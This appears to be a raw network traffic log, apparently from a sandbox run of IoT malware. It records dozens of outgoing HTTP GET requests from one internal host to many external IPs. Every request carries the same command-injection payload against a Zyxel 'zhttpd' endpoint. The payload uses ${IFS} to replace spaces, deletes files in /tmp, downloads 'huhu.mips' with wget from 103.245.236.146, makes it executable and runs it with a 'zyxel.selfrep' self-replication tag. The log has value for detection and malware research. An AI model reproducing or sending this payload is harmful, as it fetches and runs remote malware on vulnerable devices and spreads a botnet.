                                              Jan 29, 2024 07:04:05.316632986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8120192.168.2.143693684.230.162.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316672087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8121192.168.2.143481414.223.97.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316721916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8122192.168.2.143883832.166.99.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316740036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8123192.168.2.1450586152.218.192.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316772938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8124192.168.2.145990873.113.57.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316807985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8125192.168.2.145219475.39.45.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316858053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8126192.168.2.1450310113.164.99.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316895962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8127192.168.2.144039613.255.11.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316927910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8128192.168.2.1450844170.124.185.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316952944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8129192.168.2.1444554198.159.58.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.316972017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8130192.168.2.1436532184.200.161.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317034960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8131192.168.2.1451996100.187.59.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317079067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8132192.168.2.145346483.48.60.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317104101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8133192.168.2.145123031.95.86.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317152977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8134192.168.2.1454172155.155.11.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317189932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8135192.168.2.1451982129.72.17.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317239046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8136192.168.2.1437330157.146.227.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317265987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8137192.168.2.1454044154.143.138.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317293882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8138192.168.2.1450020103.175.172.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317338943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8139192.168.2.1444890187.253.67.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317372084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8140192.168.2.1460176112.133.248.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317425966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8141192.168.2.145078241.147.166.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317451000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8142192.168.2.1443436159.62.101.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317492962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8143192.168.2.144434623.8.161.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317540884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8144192.168.2.144319239.64.226.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317567110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8145192.168.2.14465188.174.50.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317616940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8146192.168.2.1450382115.2.104.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317637920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8147192.168.2.1438140187.153.45.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317701101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8148192.168.2.1460218206.205.119.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317739010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8149192.168.2.143359823.77.70.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317764044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8150192.168.2.146023413.112.88.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317815065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8151192.168.2.144027249.219.0.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317831039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8152192.168.2.143758614.223.215.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317857981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8153192.168.2.145889061.240.169.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317923069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8154192.168.2.1446998184.168.181.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.317956924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8155192.168.2.1443440157.124.172.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318005085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8156192.168.2.1437060158.52.211.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318047047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8157192.168.2.14466708.191.59.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318069935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8158192.168.2.144228850.122.52.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318115950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8159192.168.2.14606708.114.216.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318147898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8160192.168.2.1448484134.12.61.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318208933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8161192.168.2.146065075.109.96.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318252087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8162192.168.2.1449050204.90.169.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318320036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8163192.168.2.145876417.137.48.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318342924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8164192.168.2.1453750194.91.69.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318387985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8165192.168.2.1439894181.210.104.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318408966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8166192.168.2.143608854.150.210.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318460941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8167192.168.2.1459652172.84.232.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318495035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8168192.168.2.1454516172.218.45.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318526983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8169192.168.2.145273832.242.22.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318556070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8170192.168.2.1437368115.23.244.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318603039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8171192.168.2.1457536213.52.248.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318641901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8172192.168.2.1438836176.231.194.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318665028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8173192.168.2.143560270.43.182.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318718910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8174192.168.2.144562827.60.211.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318753004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8175192.168.2.1438682211.129.103.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318768978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8176192.168.2.1436346107.235.2.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318820000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8177192.168.2.1438942126.83.15.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318871021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8178192.168.2.1448630167.41.209.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318912983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8179192.168.2.1459444107.165.127.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318938971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8180192.168.2.144650690.105.125.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.318988085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8181192.168.2.145972870.126.195.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319017887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8182192.168.2.1456428191.40.97.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319063902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8183192.168.2.1439900220.152.161.143443
                                              TimestampBytes transferredDirectionData
